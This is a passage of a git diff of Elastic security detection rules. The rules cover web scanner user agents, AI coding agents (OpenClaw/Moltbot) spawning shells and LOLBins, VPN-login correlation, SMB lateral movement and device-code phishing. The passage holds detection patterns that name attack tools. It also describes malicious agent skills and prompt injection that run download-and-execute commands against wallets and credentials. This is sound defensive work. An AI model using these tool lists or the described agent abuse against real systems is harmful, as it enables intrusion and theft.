Esql.user_agent_original_to_lower = to_lower(user_agent.original), Esql.url_original_to_lower = to_lower(url.original)\n\n| where\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/74.0.3729.169 safari/537.36\" or // Nikto\n Esql.user_agent_original_to_lower like \"nikto*\" or // Nikto\n Esql.user_agent_original_to_lower like \"mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*nessus*\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"sqlmap/*\" or // SQLMap\n Esql.user_agent_original_to_lower like \"wpscan*\" or // WPScan\n Esql.user_agent_original_to_lower like \"feroxbuster/*\" or // Feroxbuster\n Esql.user_agent_original_to_lower like \"masscan*\" or // Masscan & masscan-ng\n Esql.user_agent_original_to_lower like \"fuzz*\" or // Ffuf\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/user_agent.original like~ 87.0.4280.88 safari/537.36\" or // Dirsearch\n Esql.user_agent_original_to_lower like \"mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\" or // Dirb\n Esql.user_agent_original_to_lower like \"dirbuster*\" or // Dirbuster\n Esql.user_agent_original_to_lower like \"gobuster/*\" or // Gobuster\n Esql.user_agent_original_to_lower like \"*dirsearch*\" or // dirsearch\n Esql.user_agent_original_to_lower like \"*nmap*\" or // Nmap Scripting Engine\n Esql.user_agent_original_to_lower like \"*hydra*\" or // Hydra Brute Forcer\n Esql.user_agent_original_to_lower like \"*w3af*\" or // w3af Web Application Attack and Audit Framework\n Esql.user_agent_original_to_lower like \"*arachni*\" or // Arachni Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*skipfish*\" or // Skipfish Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*openvas*\" or // OpenVAS Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*acunetix*\" or // Acunetix Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*zap*\" or // OWASP ZAP\n Esql.user_agent_original_to_lower like \"*burp*\" // Burp Suite\n\n| keep\n @timestamp,\n event.dataset,\n user_agent.original,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n Esql.user_agent_original_to_lower,\n data_stream.namespace\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.user_agent_original_values = values(Esql.user_agent_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.event_count > 50 and Esql.url_original_count_distinct > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.001", + "name": "Scanning IP Blocks", + "reference": "https://attack.mitre.org/techniques/T1595/001/" + }, + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json b/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json new file mode 100644 index 00000000000..c655d12053c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via OpenClaw Agent", + "note": "## Triage and analysis\n\n### Investigating Execution via OpenClaw Agent\n\nOpenClaw (formerly Clawdbot, rebranded to Moltbot) is a personal AI coding assistant that can execute shell commands \nand scripts on behalf of users. Malicious actors have weaponized the skill ecosystem (ClawHub) to distribute skills \nthat execute download-and-execute commands, targeting cryptocurrency wallets and credentials.\n\n### Possible investigation steps\n\n- Verify if OpenClaw/Moltbot is an approved application in your organization.\n- Review the child process command line for indicators of malicious activity (encoded payloads, remote downloads, credential access).\n- Check the parent Node.js process command line to identify which OpenClaw component initiated the execution.\n- Examine recently installed skills from ClawHub for malicious or obfuscated code.\n- Correlate with network events to identify data exfiltration or C2 communication.\n- Review the user's AI conversation history for prompt injection attempts.\n\n### False positive analysis\n\n- Developers legitimately using OpenClaw/Moltbot for AI-assisted coding may trigger this rule when the AI executes build scripts, curl commands, or other legitimate automation.\n- If the tool is approved, consider tuning based on specific command patterns or adding exception lists.\n\n### Response and remediation\n\n- If the child process activity appears malicious, terminate the OpenClaw gateway and investigate the skill that initiated the command.\n- Review and remove any suspicious skills from the OpenClaw configuration.\n- If credentials may have been accessed, rotate affected secrets and API keys.\n- Block known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the network level.\n", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"node\", \"node.exe\") and \n process.parent.command_line : (\"*openclaw*\", \"*moltbot*\", \"*clawdbot*\") and\n process.name : (\"bash\", \"sh\", \"zsh\", \"bash.exe\", \"cmd.exe\", \"powershell.exe\", \"curl.exe\", \"curl\", \"base64\", \"xattr\", \"osascript\", \"python*\", \"chmod\", \"certutil.exe\", \"rundll32.exe\") and\n not process.command_line in (\"/bin/sh -c ip neigh show\", \"/usr/bin/sh -c ip neigh show\",\n \"/bin/sh -c arp -a -n -l\", \"/usr/bin/sh -c arp -a -n -l\")\n", + "references": [ + "https://www.malwarebytes.com/blog/threat-intel/2026/01/clawdbots-rename-to-moltbot-sparks-impersonation-campaign", + "https://www.tomshardware.com/tech-industry/cyber-security/malicious-moltbot-skill-targets-crypto-users-on-clawhub", + "https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare", + "https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "Domain: LLM", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json b/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json new file mode 100644 index 00000000000..901087f324f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior.", + "from": "now-9m", + "index": [ + "logs-fortinet_fortigate.log-*", + ".alerts-security.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "FortiGate SSL VPN Login Followed by SIEM Alert by User", + "note": "## Triage and analysis\n\n### Investigating FortiGate SSL VPN Login Followed by SIEM Alert by User\n\nThis rule correlates a FortiGate SSL VPN login with a subsequent security alert for the same user name, highlighting possible abuse of VPN access or activity shortly after remote access.\n\n### Possible investigation steps\n\n- Review the FortiGate login event (source IP, user, time) and the SIEM alert(s) that followed for the same user.\n- Determine whether the user is expected to use VPN and whether the subsequent alert is related to legitimate work (e.g. admin tools, updates).\n- Check for other alerts or logins for the same user in the same time window to assess scope.\n- Correlate with authentication logs to identify impossible travel or credential reuse from the VPN session.\n\n### False positive analysis\n\n- Legitimate VPN users triggering detections (e.g. scripted tasks, admin tooling) after login.\n- Security scans or automated jobs that run in the context of a VPN-authenticated user.\n\n### Response and remediation\n\n- If abuse or compromise is suspected, disable or reset the user\u2019s VPN access and credentials.\n- Investigate the host and process associated with the SIEM alert.\n- Escalate to the security or incident response team if the alert indicates malicious activity.\n", + "query": "sequence by user.name with maxspan=10m\n [authentication where event.dataset == \"fortinet_fortigate.log\" and event.action == \"login\" and event.code in (\"0101039426\", \"0101039427\") and\n user.name != \"root\"]\n [any where event.kind == \"signal\" and kibana.alert.rule.name != null and event.dataset != \"fortinet_fortigate.log\" and\n kibana.alert.risk_score > 21 and kibana.alert.rule.rule_id != \"a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e\" and user.name != null]\n", + "references": [ + "https://attack.mitre.org/tactics/TA0001/", + "https://www.elastic.co/docs/reference/integrations/fortinet_fortigate" + ], + "related_integrations": [ + { + "package": "fortinet_fortigate", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": false, + "name": "kibana.alert.risk_score", + "type": "unknown" + }, + { + "ecs": false, + "name": "kibana.alert.rule.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "kibana.alert.rule.rule_id", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e", + "severity": "medium", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Tactic: Initial Access", + "Data Source: Fortinet", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json new file mode 100644 index 00000000000..b131f65b92c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Execution via File Shares", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : (\"exe\", \"scr\", \"pif\", \"com\") or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n not (\n (\n process.code_signature.trusted == true and\n process.code_signature.subject_name : (\n \"Veeam Software Group GmbH\",\n \"Elasticsearch, Inc.\",\n \"PDQ.com Corporation\",\n \"CrowdStrike, Inc.\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"ZOHO Corporation Private Limited\",\n \"BeyondTrust Corporation\", \n \"CyberArk Software Ltd.\", \n \"Sophos Ltd\"\n )\n ) or\n (\n process.executable : (\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n process.executable : \"G:\\\\SMS_*\\\\srvboot.exe\" and \n process.code_signature.trusted == true and process.code_signature.subject_name : \"Microsoft Corporation\"\n )\n )\n ] by host.id, process.executable\n", + "references": [ + "http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html", + "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "ab75c24b-2502-43a0-bf7c-e60e662c811e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 121 + }, + "id": "ab75c24b-2502-43a0-bf7c-e60e662c811e_121", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json new file mode 100644 index 00000000000..dcf8ae0e1e3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Matteo Potito Giorgio" + ], + "description": "Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "filebeat-*", + "logs-azure.signinlogs-*", + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID OAuth Device Code Grant by Unusual User", + "new_terms_fields": [ + "azure.signinlogs.properties.user_principal_name" + ], + "note": "## Triage and analysis\n\n### Investigating Entra ID OAuth Device Code Grant by Unusual User\n\nThis rule detects the first instance of a user authenticating via the DeviceCode authentication protocol within the historical window. The DeviceCode authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access.\n\n### Possible investigation steps\n\n- Review `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.user_id` to identify the user involved.\n- Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`.\n- Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is expected.\n- Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted location.\n- Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious.\n- Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider.\n- Review `azure.signinlogs.properties.applied_conditional_access_policies` and `azure.signinlogs.properties.conditional_access_status` to determine if MFA or conditional access policies were enforced or bypassed.\n- Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied.\n- Review `azure.signinlogs.properties.device_detail.browser` and `user_agent.original` to determine if the login aligns with expected device behavior.\n- Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client.\n- Check if the user recently reported phishing attempts or suspicious emails.\n- Look for recent changes in the user\u2019s account settings, including password resets, role changes, or delegation of access.\n- Review if other users in the environment have triggered similar DeviceCode authentication events within the same timeframe.\n\n### False positive analysis\n\n- If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected.\n- Some legitimate applications or scripts may leverage the DeviceCode authentication protocol for non-interactive logins.\n- In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts.\n- If the user is traveling or accessing from a new location, confirm legitimacy before taking action.\n\n### Response and remediation\n\n- Immediately revoke any access tokens associated with this authentication event.\n- Review additional authentication logs, application access, and recent permission changes for signs of compromise.\n- Reset the affected user\u2019s credentials and enforce stricter MFA policies for sensitive accounts.\n- Restrict DeviceCode authentication to only required applications.\n- Enable additional logging and anomaly detection for DeviceCode logins.\n- If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts.\n- Limit DeviceCode authentication to approved users and applications via conditional access policies.\n", + "query": "event.dataset:(azure.activitylogs or azure.signinlogs)\n and (\n azure.signinlogs.properties.authentication_protocol:deviceCode or\n azure.signinlogs.properties.original_transfer_method:deviceCodeFlow or\n azure.activitylogs.properties.authentication_protocol:deviceCode\n )\n and event.outcome:success\n and azure.signinlogs.properties.user_type:*\n and not azure.signinlogs.properties.app_id:(\n \"29d9ed98-a469-4536-ade2-f981bc1d605e\" or\n \"d5a56ea4-7369-46b8-a538-c370805301bf\" or\n \"80faf920-1908-4b52-b5ef-a8e7bedfc67a\" or\n \"97877f11-0fc6-4aee-b1ff-febb0519dd00\" or\n \"245e1dee-74ef-4257-a8c8-8208296e1dfd\" or\n \"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\" or\n \"74bcdadc-2fdc-4bb3-8459-76d06952a0e9\" or\n \"4813382a-8fa7-425e-ab75-3b753aab3abb\" or\n \"a850aaae-d5a5-4e82-877c-ce54ff916282\"\n )\n", + "references": [ + "https://aadinternals.com/post/phishing/", + "https://www.blackhillsinfosec.com/dynamic-device-code-phishing/", + "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/", + "https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows", + "https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.properties.authentication_protocol", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.original_transfer_method", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.user_type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "af22d970-7106-45b4-b5e3-460d15333727", + "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + }, + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 8 + }, + "id": "af22d970-7106-45b4-b5e3-460d15333727_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json b/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json deleted file mode 100644 index cc29b3fb38b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json +++ /dev/null @@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command at runtime using indexed slices of environment variables. This technique leverages character access and join operations to build execution logic dynamically, bypassing static keyword detection and evading defenses such as AMSI.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Dynamic IEX Reconstruction via Environment Variables", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Dynamic IEX Reconstruction via Environment Variables\n\nPowerShell's Invoke-Expression (IEX) command is a powerful tool for executing strings as code, often exploited by attackers to run obfuscated scripts. Adversaries may dynamically reconstruct IEX using environment variables to evade static detection. The detection rule identifies scripts that manipulate environment variables to form IEX commands, focusing on patterns of character slicing and joining, which are indicative of obfuscation 